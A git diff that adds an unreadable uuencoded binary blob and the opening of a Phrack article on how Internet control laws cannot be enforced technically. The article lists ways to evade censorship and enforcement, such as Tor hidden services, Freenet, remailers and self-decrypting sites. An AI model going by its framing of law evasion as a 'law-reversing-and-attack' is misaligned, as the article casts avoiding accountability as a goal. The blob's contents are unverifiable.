+M1B?E71Y<G#@]J+2M7=VMIM=:#]H3<1+=)NX$QA)ZB9MYV-A]).!GF3\4Q[VS
+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
+&F;<`>```
+`
+end
diff --git a/phrack65/6.txt b/phrack65/6.txt
new file mode 100644
index 0000000..9890f67
--- /dev/null
+++ b/phrack65/6.txt
@@ -0,0 +1,753 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x06 of 0x0f
+
+
+|=-----------------------------------------------------------------------=|
+|=--------=[ The only laws on the Internet are assembly and RFCs ]=------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ By julia@winstonsmith.info ]=--------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+------[  Index
+
+     0 -  starting point, our world and the Internet
+
+     1 -  What's an incoherent law ?
+
+     2 - DEEP FOCUS, AND REAL TARGET: RIPA III
+
+     3 - Elettra
+
+     4 - THE ANONYMOUS IDENTITY: julia@winstonsmith.info
+
+     5 - REFERENCES
+    
+
+------[  0. starting point, our world and the Internet
+
+2008: During the past 10 years the Internet accrued its value in a way that
+was not predictable. A lot of players are trying to gain power over it: 
+recording and cinema industries, governments, software vendors.
+
+Eight, ten years ago our feeling with the net was hacking pleasure; now,
+the hacking techniques are recycled by security vendors for their security
+services. Once the diffusion of a crack was proof of value, now it only 
+represents the risk to be busted. A lot has changed and for someone this 
+is the opportunity to reconsider and eventually change both his ways of 
+acting and his priorities.
+The spirit has changed: may the energies be readdressed?
+Is there space for fun, still, and where?
+The game now is hard. The tools in our hands have changed and threats are 
+much more realistic. Hacking is a game, but now the risk level has to 
+be carefully taken into consideration to protect ourselves and the 
+people near us, to avoid jail or being exploited.
+
+Media industry, political entities and vendors are trying every possibility
+to set foot where they can have even a minimum of control over users. This
+is because control, even if only partial, means power.
+
+We can envision how the Internet, its operating systems and softwares
+operate. We clearly know what is going on, and why it works in that 
+specific way and not otherwise.
+
+Those who are trying to get their hands on the network and on the Internet
+users often (and fortunately) do not have the skills necessary to 
+understand the concepts on which the network is based. The fact that the 
+internet society is based on technical rules before that on moral ones is 
+somehow less natural for us to believe. 
+
+So it happens that computers and the Internet are subject to legislation, 
+control and governmental based restriction, whilst the Internet and 
+computers are by definition the same all over the world and the Internet is
+made by all users equally.
+
+Whether it speaks of computers, hard drives, forensic analysis, censorship 
+or wiretapping, items are always the same. 
+We can still understand this, while the politicians are on average 50 years
+old and spent more or less 30 of those years in the political career. 
+Information technology has been developed seriously in recent 15 years, so 
+it is normal that politicians do not understand anything of IT matters. 
+
+Other than that, we see that political choices must enjoy the support of 
+the people, but people have not a better comprehension of IT matters than 
+politicians. This explains why no one has yet seen a law making some real 
+sense from a technological point of view and yet achieving its purposes 
+(which usually consists of an increased sense of security). 
+
+We think that we are the ones who can demonstrate that the Internet follows
+different laws. That's because we are the generation born with the Internet
+and we are able to speak internet language enthusiastically. 
+We, as developers, can not write laws nor directly challenge them, but we 
+can develop software demonstrating from a practical point of view how wrong
+these laws are.
+It seems to us that this is the most effective and less painful way to show
+politicians their mistakes and give citizens their freedom, ruled on the 
+Internet by mathematical logics.
+
+It is told by the Hacker Manifesto:
+
+"I made a discovery today. I found a computer. Wait a second, this is cool.
+It does what I want it to. If it makes a mistake, it's because I screwed 
+it up. Not because it doesn't like me... Or feels threatened by me... Or 
+thinks I'm a smart ass... Or doesn't like teaching and shouldn't be 
+here..."
+
+Mentor's ideas in the 1986, and our ideas since then, are the same for all
+the Internet users even now. If this freedom of acting is disturbing to 
+someone, it's our duty to remember that this freedom cannot be erased. 
+
+The incentives to hack have changed, exposure may have become uncomfortable
+...so an anonymous identity rises: julia@winstonsmith.info, dedicated to 
+the spread of software written to demonstrate the inconsistency of laws 
+to control and limit users and the Internet.
+
+
+------[  1. What's an incoherent law ?
+
+As the tendency to create inadequate laws is increasing, for what concerns 
+the control of the internet and its users, we felt the need to question 
+this modus operandi.
+
+The goal is to create software designed to demonstrate that most laws that
+restrict and control the Internet are inadequate (unnecessary, 
+counterproductive and risky). 
+
+You, more than any other community, have the chance to demonstrate that 
+any law trying to:
+
+- regulate the Internet or computer use from a governmental point of view
+- control users communications (by filtering and limiting them)
+
+are not enforceable from a scientific point of view, because they are mere 
+transposition of real life laws on the digital dimension.
+
+In general, our line of action can rely on this logic:
+- A law is promulgated (data retention, search profiling, forbidden 
+  publishing...)
+- We analyze two aspects: 
+	1) the logical structure of the law, in order to understand its 
+	   bases
+	2) the technical implementation of the law
+- From (1) we can see and develop ideas not considered
+- From (2) we can develop technical solutions 
+- The news that the law is a failure has to be spread. In fact, our
+  knowledge has no impact on politics, the audience and the users
+  information if it remains in our hands.
+
+One example of law-reversing-and-attack could be:
+
+1) Human side: A state deploys a law that forbids speaking about 
+   cryptography
+2) Tech side: being the domain owner of a website speaking of cryptography 
+   lands you in jail.
+3) Tech implementation: once the police is notified of the existence of a 
+   server inside country boundaries serving forbidden content, an email is
+   sent asking to remove the pages, or in a short time the domain owner 
+   will be busted and the server unplugged. 
+
+human countermeasure:
+
+1a) Migrate to a free blog/website outside your country.
+
+hacker countermeasure:
+
+1a) Use a TOR hidden service, reachable through the Internet with a proxy 
+    in another country [1]
+1b) Use a FreeNET website [2]
+1c) Post your content with an anonymous remailer to a mailing list [3]
+1d) Publish your contents via peer to peer network using a digital 
+    signature for trusted download, with the first node publishing the data
+    outside the country. 
+1e) Use a self decryption javascript site, capable to protect session
+    layer and cutting off crawlers that don't support javascript
+    (-> open source intelligence too), in some free-blog outside our 
+    country. [4]
